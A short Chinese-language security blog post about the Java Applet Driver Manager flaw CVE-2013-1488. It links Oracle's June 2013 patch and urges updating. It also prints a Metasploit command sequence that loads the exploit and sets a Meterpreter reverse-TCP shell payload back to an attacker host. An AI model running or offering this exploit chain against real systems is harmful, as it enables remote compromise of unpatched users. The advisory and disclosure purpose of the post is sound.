2013年6月20日 星期四

新 Oracle Java Applet Driver Manager 漏洞大爆發 (含影片示範)

新 Oracle Java Applet Driver Manager 漏洞大爆發 (含影片示範)

上一個 JSE 漏洞還沒解決,沒隔幾天又被挖出來 Java Applet 漏洞,原本各媒體又要大酸特酸,這家公司到底爛到何種程度,還好在大家開罵之前,Oracle 提前於 2013/6/18 發佈總計40多個修正程式,來杜悠悠之口。

Oracle官方網站說明:
https://blogs.oracle.com/security/entry/june_2013_critical_patch_update

解決方案:
請盡速更新 『火燙燙新版』各作業系統伺服器端與使用者端的修正程式,畢竟相關攻擊工具在網路上都已經提前於修補程式先釋出了。

漏洞發佈日期:
由 2013 Pwn2Own 首發,2013/6/7(發佈概念驗證程式 PoC)

漏洞編號:
CVE-2013-1488
OSVDB-91472
BID-58504
ZDI-13-076

影響的 Java 版本:
JSE 7 Update 17 (含之前的版本)

影片內指令:
use exploit/multi/browser/java_jre17_driver_manager
set SRVHOST 192.168.178.36
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.36
exploit
getuid
sysinfo

參考資料來源:
http://eromang.zataz.com/2013/06/19/cve-2013-1488-oracle-java-applet-driver-manager-vulnerability-metasploit-demo/


轉載自《網路攻防戰》

沒有留言:

張貼留言